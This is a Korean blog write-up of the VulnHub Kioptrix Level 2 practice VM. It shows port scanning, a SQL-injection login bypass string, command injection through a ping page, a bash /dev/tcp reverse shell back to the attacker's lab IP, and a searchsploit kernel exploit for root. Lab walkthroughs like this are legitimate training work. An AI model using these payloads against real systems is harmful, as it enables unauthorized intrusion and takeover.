[분석환경]
VMware 2010 Pro
Kali Linux 2021.01[분석도구]
1. netdiscover
2. nmap
3. netcat
4. msf(metasploit)
5. python2[문제 경로]
https://isroot.nl/2018/09/09/vulnhub-write-up-kioptrix-level-2/
1. netdiscover
칼리에서 netdiscover 명령으로 동일 NAT상에 있는 타겟을 탐색한다.
2. nmap
포트스캔 명령을 통해 열린 포트를 확인한다. 80포트가 열려 있음을 확인하였고 브라우저에서 http://192.168.159.130로 접속하여 페이지를 확인한다.
> nmap -sC -sV 192.168.159.130
접속하면 로그인 페이지가 나온다.
SQL Injection 시도하여 인증과정을 우회할 수 있다.
입력한 ID > root' OR 1=1 --
입력한 PW > 1
로그인 이후에는 입력한 IP 주소로 pingtest를 수행하는 페이지가 나온다.
3. Command Injection
세미콜론(;)을 사용하여 명령을 구분하고 사용할 명령어를 입력하여 명령어가 실행되는지 확인한다.
php에서 명령어 인젝션이 가능함을 확인하였으므로 리버스쉘을 구성한다.
4. Reverse Shell
kali에서 nc -nvlp 443 —allow 192.168.159.131
명령을 사용하여 리버스쉘 연결을 대기한다.
타겟에서 127.0.0.1;bash -i >& /dev/tcp/192.168.159.129/443 0>&1
를 실행하여 리버스 쉘 연결을 시도한다.
구버전의 리눅스(Linux version 2.6.9)를 사용하고 있는 것을 확인할 수 있다.
5. exploit
searchsploit Linux Kernel 2.6 CentOS | grep CentOS
명령을 통해 버전에 맞는 익스플로잇을 검색한다.
searchsploit -m 9542.c
을 통해 다운받는다.
다운받은 파일을 연결된 쉘을 통해 타겟에서 다운받고 실행시키면 root 권한을 획득할 수 있다.
6. GET ROOT
+. Review
모의침투 테스트 환경이 많지 않은데 VM을 기반으로 한 좋은 문제중 하나였다. 다음 단계도 풀어보자!
'Wargame & CTF > Pentest' 카테고리의 다른 글
[vulnhub] Tr0ll: 1 - writeup (0) | 2021.03.19 |
---|---|
[vulnhub] PwnLab - Writeup (0) | 2021.03.16 |